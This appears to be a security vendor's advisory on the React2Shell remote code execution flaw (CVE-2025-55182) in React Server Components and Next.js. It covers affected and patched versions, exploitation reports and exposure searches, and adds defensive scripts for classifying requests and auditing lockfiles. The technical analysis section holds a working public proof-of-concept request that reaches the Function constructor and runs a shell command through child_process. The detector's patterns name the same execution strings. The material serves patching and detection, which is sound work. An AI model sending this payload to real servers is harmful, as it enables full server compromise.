React2Shell: Critical RCE Flaw (CVE-2025-55182)
Immediate Threat: React2Shell Hits the Wild
On December 3, 2025, the web development community was put on high alert by the disclosure of CVE-2025-55182, a critical vulnerability dubbed "React2Shell". This is not a theoretical risk; it is an active, ongoing threat. With the maximum CVSS severity score of 10.0, React2Shell is a critical unauthenticated remote code execution (RCE) flaw in React Server Components (RSC).
The vulnerability stems from unsafe deserialization in the "Flight" protocol that RSC uses to exchange payloads between client and server. A remote, unauthenticated attacker can execute arbitrary code on the server simply by sending a specially crafted HTTP request to a Server Function endpoint. The barrier to exploitation is dangerously low, and the impact is total compromise of the server process. Only applications that actually serve RSC payloads are exposed: a client-only React build that never runs the react-server-dom-* packages on a server is not in scope, which makes inventorying where RSC is deployed the first job.
Active Exploitation and CISA Warning
The window between disclosure and exploitation was virtually non-existent. AWS researchers reported that China-nexus threat actors began weaponizing this flaw within 24 hours of its public disclosure. These attackers are targeting vulnerable cloud-hosted applications using RSC, often deploying web shells and persistent backdoors immediately after gaining initial access.
Recognizing the severity and active exploitation, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-55182 to its Known Exploited Vulnerabilities (KEV) Catalog on December 5. This mandates that federal agencies patch the flaw, signaling to all organizations the urgency required.
Vulnerability Details: CVE-2025-55182
| Field | Description |
|---|---|
| CVE-ID | CVE-2025-55182 — CVSS 10.0 — Assigned by Facebook. |
| Vulnerability Description | React Server Components (RSC) and related packages improperly deserialize JSON payloads sent to Server Function endpoints. An unauthenticated attacker can supply a crafted payload via an HTTP request that causes the server to execute arbitrary JavaScript code, leading to full RCE. |
| Date of Disclosure | December 3, 2025 |
| Affected Assets | Server‑side applications using React 19.x (RSC) including react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack, and frameworks that embed them like Next.js (App Router), React Router RSC preview, Waku, Vite RSC plugin, and RedwoodSDK. |
| Vulnerable Versions | React packages (react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack): 19.0.0, 19.1.0, 19.1.1 and 19.2.0. Next.js (App Router only): 14.3.0-canary.77 and later 14.3 canaries, and every 15.x and 16.x release older than the patched versions listed under Patch Status. |
| PoC Available? | Yes; multiple public PoCs have been released. Exercise extreme caution, as fake or malware-infected PoCs are also circulating. |
| Exploitation Status | Actively Exploited. Amazon Threat Intelligence observed exploitation by China-aligned groups. CISA added it to the KEV catalog. GreyNoise has confirmed widespread scanning and exploitation attempts. |
| Patch Status | Patches are available. React: update the react-server-dom-* package in use to 19.0.1, 19.1.2 or 19.2.1, whichever matches the minor line already deployed. Next.js: update to 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7 or 16.0.7, whichever matches the minor line already deployed. |
Technical Analysis: The Exploit Payload
The exploit works by sending a multipart/form-data POST request to a Server Function endpoint. The form field carries a JSON object that abuses the Flight protocol's `$` reference syntax: instead of pointing at another chunk of the payload, references such as `$1:__proto__:then` and `$1:constructor:constructor` walk through an object's prototype chain until they reach the Function constructor, and the deserializer is tricked into compiling and running an attacker-supplied string. The root cause is therefore unsafe reference resolution during deserialization that hands the attacker a code-execution gadget, rather than classic prototype pollution of a shared object. For Next.js applications, the Next-Action header is the key indicator that a request targets a Server Action.
Here is a simplified example of a public Proof-of-Concept request:

```http
POST / HTTP/1.1
Host: vulnerable-app.com
User-Agent: Mozilla/5.0
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('id');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```

Reading the payload: field `0` is the object the server deserializes, and it impersonates an internal Flight response. Its `_formData.get` property is the reference `$1:constructor:constructor`, which resolves to the Function constructor, and `_prefix` is the source string handed to it. When the server resolves the nested `$B1337` (blob) reference it calls `_formData.get(_prefix + id)`, which with these substitutions compiles the attacker's string into a function, and the crafted thenable (`then` pointing at `$1:__proto__:then`) causes it to run. The result is `process.mainModule.require('child_process').execSync('id')` executing with the privileges of the Node.js process. `id` is a trivial demonstration of full server control; a real attacker places a web shell dropper or reverse shell in the same slot.
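As an added example (not code from the original advisory, React or Next.js), the following Node.js script turns the indicators visible in the payload above into a request classifier that can be run offline over captured traffic. It parses a raw HTTP request and separates the Server Action shape (Next-Action plus multipart, which legitimate submissions also have) from the high-confidence markers: Flight `$` references that step into `__proto__` or `constructor`, and a smuggled `_response` object carrying `_prefix` or `_formData`. The sample requests are constructed for this example; the hostnames, action ID and boundary are placeholders.

```javascript
// Added example, not code from the original advisory or from React/Next.js.
// Classifies raw HTTP requests by the indicators visible in the public
// React2Shell PoC so it can be run offline over captured traffic. All sample
// requests below are constructed; hostnames, action IDs and boundaries are
// placeholders.

// Flight "$" references that step into the prototype chain or the Function
// constructor, e.g. "$1:__proto__:then" and "$1:constructor:constructor".
// Ordinary references look like "$1", "$@0" or "$B1337" and do not match.
const PROTO_TRAVERSAL = /\$\d+(?::[\w$]+)*:(?:__proto__|constructor|prototype)\b/;
// The PoC smuggles a fake internal Flight response object carrying the code
// string (_prefix) and the callable to reach (_formData.get).
const FORGED_RESPONSE = /"_response"\s*:\s*\{[^}]*"_(?:prefix|formData)"/;
// Strings the public PoC uses to reach command execution. Attackers can
// trivially rewrite these, so they are supporting evidence only.
const EXEC_STRINGS = /child_process|execSync|process\.mainModule|\bspawn(?:Sync)?\(/;

const RANK = { none: 0, info: 1, medium: 2, high: 3 };

// Split a raw HTTP/1.1 request (CRLF or LF line endings) into its parts.
function parseRequest(raw) {
  const text = raw.replace(/\r\n/g, "\n");
  const sep = text.indexOf("\n\n");
  const head = sep === -1 ? text : text.slice(0, sep);
  const body = sep === -1 ? "" : text.slice(sep + 2);
  const [requestLine = "", ...headerLines] = head.split("\n");
  const [method = "", path = ""] = requestLine.split(" ");
  const headers = {};
  for (const line of headerLines) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method, path, headers, body };
}

// Returns the matched indicators and a verdict: "block", "review" or "allow".
function analyzeRequest(raw) {
  const req = parseRequest(raw);
  const indicators = [];
  const contentType = req.headers["content-type"] || "";
  // Legitimate Server Action submissions look exactly like this, so on its
  // own it only says the request reaches the Server Function code path.
  if (req.method === "POST" && "next-action" in req.headers && contentType.startsWith("multipart/form-data")) {
    indicators.push({ name: "server-action-shape", severity: "info" });
  }
  if (PROTO_TRAVERSAL.test(req.body)) indicators.push({ name: "flight-prototype-traversal", severity: "high" });
  if (FORGED_RESPONSE.test(req.body)) indicators.push({ name: "forged-flight-response", severity: "high" });
  if (EXEC_STRINGS.test(req.body)) indicators.push({ name: "command-execution-string", severity: "medium" });
  const worst = indicators.reduce((acc, ind) => (RANK[ind.severity] > RANK[acc] ? ind.severity : acc), "none");
  const verdict = worst === "high" ? "block" : worst === "medium" ? "review" : "allow";
  return { method: req.method, path: req.path, indicators, verdict };
}

// Constructed sample 1: shaped like the public PoC (command kept as `id`).
const POC_REQUEST = [
  "POST / HTTP/1.1", "Host: app.example", "Next-Action: x",
  "Content-Type: multipart/form-data; boundary=----b", "",
  "------b", 'Content-Disposition: form-data; name="0"', "",
  '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"process.mainModule.require(\'child_process\').execSync(\'id\');","_formData":{"get":"$1:constructor:constructor"}}}',
  "------b", 'Content-Disposition: form-data; name="1"', "", '"$@0"', "------b--",
].join("\r\n");

// Constructed sample 2: an ordinary Next.js Server Action form submission.
const BENIGN_ACTION = [
  "POST /signup HTTP/1.1", "Host: app.example", "Next-Action: 7f3a9c",
  "Content-Type: multipart/form-data; boundary=----b", "",
  "------b", 'Content-Disposition: form-data; name="1_email"', "", "alice@example.test",
  "------b", 'Content-Disposition: form-data; name="0"', "", '["$K1"]', "------b--",
].join("\r\n");

// Constructed sample 3: unrelated traffic.
const PLAIN_GET = "GET /about HTTP/1.1\r\nHost: app.example\r\n\r\n";

for (const [label, raw] of [["poc", POC_REQUEST], ["benign", BENIGN_ACTION], ["get", PLAIN_GET]]) {
  const result = analyzeRequest(raw);
  console.log(label, result.verdict, result.indicators.map((i) => i.name).join(","));
}
```

The design point is the split between `info` and `high`: the Server Action shape is a scoping filter that selects traffic reaching the vulnerable code path, and only the payload-level markers justify a block. Run over real logs, anything that scores `block` or `review` before the patch was deployed is a compromise lead, not just a scan.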
Global Scope and Attack Surface
The adoption of React, Next.js, and Server Components is massive. Any internet-facing server running affected versions is a target. Security researchers have used search engines like Censys and Shodan to identify potentially vulnerable assets by looking for specific HTTP headers.
- Shodan: Over 380,000 assets match the query "Vary: RSC, Next-Router-State-Tree".
- Censys: Reports over 270,000 assets with similar headers.
🚨 Censys on #React2Shell (CVE-2025-55182): We observe ~2.15M exposed web services running Next.js or other RSC-based frameworks—mostly in the U.S. and China. Not all are vulnerable, but active exploitation is underway. Patch now.
The Flawtrack platform has already detected over 3,500 infected assets in Malaysia alone, indicating rapid and widespread compromise in the region.
Hunting and Mitigation
Security teams must assume they are vulnerable until proven otherwise. Patching is the only complete remediation. If you cannot patch immediately, take the affected applications offline or put a WAF in front of them, but choose the signature carefully: a POST carrying a Next-Action header with a multipart/form-data body is exactly what every legitimate Next.js Server Action submission looks like, so blocking on that combination alone breaks the application. Block or alert on payload-level markers instead, such as Flight `$` references that step into `__proto__` or `constructor` (as in `$1:__proto__:then` and `$1:constructor:constructor` in the public PoC), and treat the header/multipart combination as a scoping filter rather than a verdict. Any WAF rule is a stopgap that an attacker can vary around; it buys time to patch, nothing more.
To identify potentially vulnerable systems on your external attack surface, you can use queries that look for technology fingerprints in response headers:

```
services.http.response.headers: (key: `Vary` and value.headers: `RSC, Next-Router-State-Tree`)
```

For a more comprehensive search, Censys provides a detailed query to identify services using RSC or affected frameworks:

```
web.endpoints.http.headers: (key: "Content-Type" and value: "text/x-component") or web.endpoints.http.headers: (key: "Vary" and value: "RSC") or web.software.product:"next.js"
```

These fingerprints establish that a host serves RSC or Next.js, not that it runs a vulnerable version; each hit still needs its deployed package versions checked before it is counted as exposed or dismissed.
Your Next Steps
React2Shell is not a vulnerability to be monitored; it is one to be eliminated from your environment immediately.
- Identify: Scan your entire software inventory and external attack surface for applications using React Server Components, Next.js (App Router) and the other affected frameworks. Check the resolved versions of react-server-dom-webpack, react-server-dom-parcel and react-server-dom-turbopack in lockfiles, not just the framework version, since frameworks pull these packages in transitively.
- Patch: Immediately apply the security updates released by React and Next.js, then rebuild and redeploy; only a rebuilt bundle removes the vulnerable code from the running server.
- Verify: After patching, confirm from the deployed build that the patched package versions are actually in use. Review access logs from the disclosure date onward for POST requests carrying a Next-Action header whose payloads reference `__proto__` or `constructor`, and treat any such request received before the patch was applied as a potential compromise that warrants incident response, not just a rescan.
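As an added example (not a tool from the advisory or from the React or Next.js projects), the following Node.js script encodes the vulnerable and patched version lists from the table above and assesses resolved package versions taken from a lockfile or `npm ls --json`. It implements enough of semver to order prereleases correctly, so the 14.3.0-canary.77 cut-off and canary builds of patched releases compare the way the advisory intends. The `SAMPLE_INSTALLED` map is constructed for this example; the package names are real, the versions are illustrative.

```javascript
// Added example, not a tool from the advisory or from the React/Next.js
// projects. Assesses resolved package versions against the vulnerable and
// patched releases listed in the advisory table. SAMPLE_INSTALLED is
// constructed for this example.

// Packages that ship the Flight deserialisation code.
const RSC_PACKAGES = ["react-server-dom-webpack", "react-server-dom-parcel", "react-server-dom-turbopack"];
// First patched release of each affected minor line, per the advisory.
const REACT_FIXED = { "19.0": "19.0.1", "19.1": "19.1.2", "19.2": "19.2.1" };
const NEXT_FIXED = {
  "15.0": "15.0.5", "15.1": "15.1.9", "15.2": "15.2.6", "15.3": "15.3.6",
  "15.4": "15.4.8", "15.5": "15.5.7", "16.0": "16.0.7",
};
// Earliest Next.js build listed as affected; the advisory lists no 14.x fix.
const NEXT_FIRST_AFFECTED = "14.3.0-canary.77";

// Minimal semver parser: optional "v" prefix, prerelease kept as identifiers.
// Returns null for ranges such as "^15.4.0" so callers notice unresolved input.
function parseSemver(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?/.exec(String(v).trim());
  return m ? { major: +m[1], minor: +m[2], patch: +m[3], pre: m[4] ? m[4].split(".") : [] } : null;
}

// Prerelease identifiers: numeric ones compare numerically and sort before
// alphanumeric ones; a release sorts after any prerelease of the same version.
function compareIds(a, b) {
  const na = /^\d+$/.test(a), nb = /^\d+$/.test(b);
  if (na && nb) return +a - +b;
  if (na) return -1;
  if (nb) return 1;
  return a < b ? -1 : a > b ? 1 : 0;
}
function compareSemver(a, b) {
  for (const k of ["major", "minor", "patch"]) if (a[k] !== b[k]) return a[k] - b[k];
  if (!a.pre.length && !b.pre.length) return 0;
  if (!a.pre.length) return 1;
  if (!b.pre.length) return -1;
  for (let i = 0; i < Math.max(a.pre.length, b.pre.length); i++) {
    if (i >= a.pre.length) return -1;
    if (i >= b.pre.length) return 1;
    const c = compareIds(a.pre[i], b.pre[i]);
    if (c) return c;
  }
  return 0;
}

// Assess one resolved package version against the advisory's tables.
function assess(pkg, version) {
  const v = parseSemver(version);
  if (!v) return { pkg, version, status: "unresolved", note: "pass the resolved version from the lockfile, not a range" };
  const line = `${v.major}.${v.minor}`;
  const verdict = (fixed) =>
    compareSemver(v, parseSemver(fixed)) < 0
      ? { pkg, version, status: "vulnerable", upgradeTo: fixed }
      : { pkg, version, status: "patched" };
  if (RSC_PACKAGES.includes(pkg)) {
    if (v.major !== 19) return { pkg, version, status: "not-affected", note: "only 19.x is listed as affected" };
    return REACT_FIXED[line] ? verdict(REACT_FIXED[line]) : { pkg, version, status: "unknown", note: "minor line not in the advisory table" };
  }
  if (pkg === "next") {
    if (compareSemver(v, parseSemver(NEXT_FIRST_AFFECTED)) < 0) return { pkg, version, status: "not-affected" };
    if (v.major === 14) return { pkg, version, status: "vulnerable", upgradeTo: "any patched 15.x/16.x release", note: "14.3 canary line, no 14.x fix listed; App Router only" };
    return NEXT_FIXED[line] ? { ...verdict(NEXT_FIXED[line]), note: "App Router only" } : { pkg, version, status: "unknown", note: "minor line not in the advisory table" };
  }
  return { pkg, version, status: "not-tracked" };
}

// Assess every tracked package in a name -> resolved-version map.
function auditInstalled(installed) {
  return Object.entries(installed)
    .filter(([pkg]) => pkg === "next" || RSC_PACKAGES.includes(pkg))
    .map(([pkg, version]) => assess(pkg, version));
}

// Constructed sample: resolved versions as a lockfile or `npm ls --json` reports them.
const SAMPLE_INSTALLED = { next: "15.4.7", react: "19.1.1", "react-server-dom-webpack": "19.1.1", lodash: "4.17.21" };
for (const finding of auditInstalled(SAMPLE_INSTALLED)) console.log(finding);
```

Feed it the versions actually resolved in package-lock.json or pnpm-lock.yaml rather than the ranges in package.json: `^19.1.0` says nothing about whether 19.1.2 was installed, and the vulnerable Flight code lives in the react-server-dom-* packages rather than in `react` itself, so check those even when a framework pulled them in transitively. A Next.js hit still needs the App Router caveat applied by hand, since a lockfile cannot tell you which router the application uses.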
The widespread adoption of these technologies combined with the simplicity of the exploit makes this a perfect storm. The risk is high, the impact is critical, and attackers are not waiting. Contact Flawtrack for a comprehensive analysis of your attack surface to uncover and remediate exposures like React2Shell before they are exploited.